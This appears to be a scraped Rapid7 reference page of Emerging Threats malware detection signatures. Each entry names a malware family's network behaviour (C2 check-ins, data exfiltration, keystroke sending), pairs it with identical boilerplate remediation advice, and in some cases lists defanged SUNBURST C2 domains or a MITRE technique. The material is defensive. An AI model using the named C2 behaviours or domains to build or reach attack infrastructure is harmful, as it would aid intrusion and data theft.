This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Enfal CnC GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Enfal CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Enigma Locker Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [eSentire] Cobalt Strike Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [eSentire] VBS Retrieving Malicious Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE ESPecter Bootkit Initialization Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ETag HTTP Header Observed at CNCERT Sinkhole

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ETag HTTP Header Observed at JPCERT Sinkhole

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EtumBot Ping

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EtumBot Registration Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EUPUDS.A Requests for Boleto replacement

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evil Google Drive Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evil Monero Cryptocurrency Miner Request Pools

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evilnum Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Checkin Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Client Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Client Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Client Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EVILNUM CnC Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EvilNum CnC Error Report

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EVILNUM CnC Host Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EVILNUM CnC Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evil PDF Retrieving Emotet Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evrial Stealer CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evrial Stealer CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Evrial Stealer Retrieving CnC Information

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Executable Download Purporting to be JavaScript likely 2nd stage Infection

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE EXE Download When Server Claims To Send Audio File - Must Be Win32

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Exorcist 2.0 Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE FaceBook IM & Web Driven Facebook Trojan Posting Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FAKBEN Ransomware

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE FAKE AOL SSL Cert APT1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV Check-in purporting to be MSIE with invalid terse HTTP headers

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAvCn-A Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAvCn-A Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV.dfze/FakeAV!IK Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fake AV Downloader.Onestage/FakeAlert.ZR User-Agent (AV1)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FakeAV.EGZ Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV.EGZ Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV FakeSmoke HTTP POST check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake AV GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FAKE AV HTTP CnC Post

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV Install

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV Landing Page

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV Landing Page (aid sid)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV oms.php Data Post

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV security_scanner.exe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV User-Agent XML

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FakeAV Variant CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE FakeAV Win32/Antivirus2008 CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Faked Russian Opera UA without Accept - probable downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake Google Chrome Notifications Installer

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake IBM SSL Cert APT1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FAKEIE Minimal Headers (flowbit set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FAKE/ROGUE AV/Security Application Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake/Short Google Search Appliance UA Win32/Ranbyus and Others

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake Software Download Redirect Leading to Malware M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake Software Download Redirect Leading to Malware M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake Software Download Redirect Leading to Malware M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake Variation of Mozilla 4.0 - Likely Trojan

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake Virtually SSL Cert APT1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fake Windows Scam ScreenLocker

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FAKE YAHOO SSL Cert APT1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fareit/Pony Downloader Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fareit/Pony Downloader Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Farfli HTTP Checkin Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Fasec/FakeAV Alert/Keylogger/Dropper/DNSChanger Possible Rootkit - HTTP GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS RAM Scraper Sending Details

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS Reporting Error Code

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS Sending Keystrokes

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS Sending Status Logs

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS Software Update Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS Successful Software Update Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FastPOS Version Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FBot Downloader Generic GET for ARM Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Felismus CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Felismus CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE FF-RAT Stage 1 CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FighterPOS CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE FighterPOS CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Fileless infection dropped by EK CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Filename explorer.exe Download - Common Hostile Filename

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Filename hkcmd.exe Download - Common Hostile Filename

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Filename server.exe Download - Common Hostile Filename

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Filename svchost.exe Download - Common Hostile Filename

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FIN6 StealerOne CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FIN7 JSSLoader Activity (GET)

Description

Recommendation

ET MALWARE FIN7 JSSLoader Activity (POST)

Description

Recommendation

ET MALWARE FIN7 JSSLoader Variant Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FIN7 JSSLoader Variant Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FIN7 JSSLoader Variant Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE FindPOS Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.BEACON M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (databasegalore .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (incomeupdate .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (panhardware .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.BEACON SSL Cert Inbound (zupertech .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to avsvmcloud .com

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to deftsecurity .com

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to digitalcollege .org

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to freescanonline .com

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to thedoccloud .com

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST HTTP Request to virtualdataserver .com

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (avsvmcloud .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (deftsecurity .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (digitalcollege .org)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (freescanonline .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

